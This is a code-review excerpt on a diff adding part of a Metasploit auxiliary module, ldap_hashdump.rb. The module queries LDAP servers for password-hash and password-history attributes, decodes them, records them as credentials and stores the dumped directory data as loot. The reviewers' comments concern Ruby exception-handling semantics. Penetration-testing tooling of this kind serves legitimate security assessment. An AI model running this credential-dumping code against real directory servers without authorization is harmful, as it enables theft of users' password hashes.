modules/auxiliary/gather/ldap_hashdump.rb

```diff
@@ -0,0 +1,395 @@
+              if entry[attr].any?
+                creds_found += process_hash(entry, attr)
+              end
+            end
+          end
+        end
+      rescue Timeout::Error
+        print_error("#{peer} Host timeout reached while searching '#{base_dn}'")
+        return entries_returned
+      ensure
+        unless ldap.get_operation_result.code == 0
+          print_ldap_error(ldap)
+        end
+        if entries_returned > 0
+          print_status("#{peer} #{entries_returned} entries, #{creds_found} creds found in '#{base_dn}'.")
+          f.rewind
+          pillage(f.read, base_dn)
+        elsif ldap.get_operation_result.code == 0
+          print_error("#{peer} No entries returned for '#{base_dn}'.")
+        end
+      end
+    end
+    entries_returned
+  end
+
+  def pillage(ldif, base_dn)
+    vprint_status("#{peer} Storing LDAP data for base DN='#{base_dn}' in loot")
+
+    ltype = base_dn.clone
+    ltype.gsub!(/ /, '_')
+    ltype.gsub!(/,/, '.')
+    ltype.gsub!(/(ou=|fn=|cn=|o=|dc=|c=)/i, '')
+    ltype.gsub!(/[^a-z0-9\.\_\-]+/i, '')
+    ltype = ltype.last(16)
+
+    ldif_filename = store_loot(
+      ltype, # ltype
+      'text/plain', # ctype
+      @rhost, # host
+      ldif, # data
+      nil, # filename
+      "Base DN: #{base_dn}" # info
+    )
+
+    unless ldif_filename
+      print_error("#{peer} Could not store LDAP data in loot")
+      return
+    end
+
+    print_good("#{peer} Saved LDAP data to #{ldif_filename}")
+
+  end
+
+  def decode_pwdhistory(hash)
+    # https://ldapwiki.com/wiki/PwdHistory
+    parts = hash.split('#', 4)
+    unless parts.length == 4
+      return hash
+    end
+
+    hash = parts.last
+    unless hash.starts_with?('{')
+      decoded = Base64.decode64(hash)
+      if decoded.starts_with?('{') || (decoded =~ /[^[:print:]]/).nil?
+        return decoded
+      end
+    end
+    hash
+  end
+
+  def process_hash(entry, attr)
+    service_details = {
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      address: @rhost,
+      port: rport,
+      protocol: 'tcp',
+      service_name: 'ldap'
+    }
+
+    creds_found = 0
+
+    # This is the "username"
+    dn = entry[@user_attr].first # .dn
+
+    entry[attr].each do |hash|
+      if attr == 'pwdhistory'
+        hash = decode_pwdhistory(hash)
+      end
+
+      # 20170619183528ZHASHVALUE
+      if attr == 'passwordhistory' && hash.start_with?(/\d{14}Z/i)
+        hash.slice!(/\d{14}Z/i)
+      end
+
+      # Cases *[crypt}, !{crypt} ...
+      hash.gsub!(/.?{crypt}/i, '{crypt}')
+
+      # We observe some servers base64 encdode the hash string
+      # and add {crypt} prefix to the base64 encoded value
+      # e2NyeXB0f in base64 means {crypt
+      # e3NtZD is {smd
+      if hash.starts_with?(/{crypt}(e2NyeXB0f|e3NtZD)/)
+        begin
+          hash = Base64.strict_decode64(hash.delete_prefix('{crypt}'))
+        rescue ArgumentError
+          nil
+        end
```

Comment:
You can inline these 5 lines to

```suggestion
hash = Base64.strict_decode64(hash.delete_prefix('{crypt}')) rescue ArgumentError
```

Reply:
Seems my previous comment has not been saved, hope this time ....
Intent of my code was not to modify the `hash` value, if the `ArgumentError` gets raised. The one liner behaves differently:
```
irb(main):001:0> require "base64"
=> true
irb(main):002:0> hash = '{crypt}11111'
irb(main):003:0> hash = Base64.strict_decode64(hash.delete_prefix('{crypt}')) rescue ArgumentError
irb(main):004:0> hash
=> ArgumentError
irb(main):005:0> hash = '{crypt}11111'
irb(main):006:1* begin
irb(main):007:1*   hash = Base64.strict_decode64(hash.delete_prefix('{crypt}'))
irb(main):008:1* rescue ArgumentError
irb(main):009:1*   nil
irb(main):010:0> end
=> nil
irb(main):011:0> hash
=> "{crypt}11111"

```